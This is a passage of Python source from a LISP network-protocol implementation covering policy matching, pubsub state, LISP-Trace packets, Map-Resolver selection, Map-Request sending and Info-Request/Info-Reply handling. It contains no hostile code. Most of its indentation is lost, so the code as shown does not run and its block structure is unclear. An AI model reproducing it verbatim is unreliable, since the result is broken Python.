        if (mi < "00" or mi > "59"): return(False)
        if (sec < "00" or sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
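#
# Illustrative lisp_datetime usage (values assumed); the input format is
# "YYYY-MM-DD-HH:MM:SS" and parse_datetime() strips the punctuation so
# instants compare numerically:
#
#   dt = lisp_datetime("2020-01-31-23:59:59")
#   dt.datetime                  # 20200131235959
#   dt.past()                    # True once that instant has passed
#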
#
# Policy data structures.
#
class lisp_policy_match(object):
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
    #enddef
#endclass
class lisp_policy(object):
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if (name in lisp_geo_list) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if (name in lisp_elp_list) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if (name in lisp_rle_list) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if (name in lisp_json_list) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
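#
# Illustrative policy setup (names and values assumed): every sub-test
# present in a match clause must pass for match_policy_map_request() to
# return True.
#
#   p = lisp_policy("example-policy")
#   m = lisp_policy_match()
#   m.datetime_lower = lisp_datetime("2020-01-01-00:00:00")
#   m.datetime_upper = lisp_datetime("2030-01-01-00:00:00")
#   p.match_clauses.append(m)
#   p.set_rloc_record_name = "rtr-1"
#   p.save_policy()
#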
class lisp_pubsub(object):
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
self.eid_prefix = None
#enddef
def add(self, eid_prefix):
self.eid_prefix = eid_prefix
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (eid not in lisp_pubsub_cache):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (self.xtr_id in pubsub):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (eid in lisp_pubsub_cache):
pubsub = lisp_pubsub_cache[eid]
if (self.xtr_id in pubsub):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
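#
# Sketch of pubsub cache behavior (variables assumed): state is cached per
# EID-prefix and keyed by xtr-id, so a re-subscribe from the same xTR
# replaces its existing entry.
#
#   ps = lisp_pubsub(itr, port, nonce, ttl, xtr_id)
#   ps.add(eid_prefix)        # logs "Add" or "Replace" for this xtr-id
#   ps.delete(eid_prefix)     # removes state for this xtr-id only
#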
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace(object):
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
        #endtry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
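#
# Minimal decode sketch (illustrative field values): the first 32-bit word
# carries type 9 in the high nibble and the local private port in the low
# 16 bits, the second word is the local private IPv4 RLOC, followed by the
# 64-bit nonce and an optional JSON payload.
#
#   trace = lisp_trace()
#   pkt = struct.pack("II", socket.htonl(0x900010f5),
#       socket.htonl(0x0a000001)) + struct.pack("Q", 0x1234)
#   trace.decode(pkt)    # local_rloc "10.0.0.1", local_port "4341"
#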
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in list(lisp_map_servers_list.values()):
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in list(lisp_map_servers_list.values()): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in list(lisp_map_resolvers_list.values()):
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
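#
# Illustrative calls, per the argument semantics described above:
#
#   lisp_get_map_resolver(address, None)   # exact match on MR address
#   lisp_get_map_resolver(None, "")        # any MR, first one found
#   lisp_get_map_resolver(None, None)      # LRU MR with mr-name "all"
#   lisp_get_map_resolver(None, eid)       # LRU MR for EID's database mr-name
#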
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in list(lisp_map_resolvers_list.values()):
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
    # Check for an IGMP packet first. Don't verify the IP checksum and don't
    # test TTL for it.
#
if (ord(packet[9:10]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(dest):
now = lisp_get_timestamp()
#
# Do we have rate-limiting disabled temporarily?
#
elapsed = now - lisp_no_map_request_rate_limit
if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
dprint("No Rate-Limit Mode for another {} secs".format(left))
return(False)
#endif
#
    # Did we send a Map-Request recently?
#
if (lisp_last_map_request_sent == None): return(False)
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format( \
green(dest.print_address(), False), round(elapsed, 3)))
#endif
return(rate_limit)
#enddef
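#
# Illustrative timeline (timer values depend on the LISP_MAP_REQUEST_
# RATE_LIMIT and LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME constants defined
# elsewhere in this file): a data-triggered Map-Request within
# LISP_MAP_REQUEST_RATE_LIMIT seconds of the previous one returns True
# (suppress), unless no-rate-limit mode was entered recently, in which
# case False is returned for its entire duration.
#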
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc,
pubsub=False):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
    # RLOC-probe. We use probe_port 4341 so the ITR and RTR keying data
    # structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
map_request.subscribe_bit = pubsub
map_request.xtr_id_present = pubsub
#
    # Hold the request nonce so we can match replies from xTRs that have
    # multiple RLOCs. This is because the reply's source address may not be
    # the probed destination. And on our ETR implementation, we can get the
    # probe-request destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
if (probe_dest.is_ipv4() and probe_dest.is_multicast_address()):
dest = probe_dest
else:
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
#endif
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for Map-Request rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
    # We then turn the line we want into an "ip route add" command. Then at
# the end of this function we remove the route.
#
    # We do this on the ETR only so we don't have the lisp-itr and lisp-etr
    # processes both adding and deleting host routes (for Info-Request
    # sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
    # Send packet to the control port via the control-sockets interface. For
    # port 4341, do the same via the lisp-core process but prepend a LISP
    # data header to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
            # come to this lisp-etr process. The commented-out call below
            # would allow Info-Requests to use source port 4342 but would
            # break the data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
    # Cache info sources so we can process Map-Requests from them specially
    # and proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# whose signature-eid flag is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devices.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(list(rtr_list.values()))):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), list(rtr_list.keys())))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (addr_str in lisp_rtr_list):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in list(lisp_iid_to_interface.keys()):
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
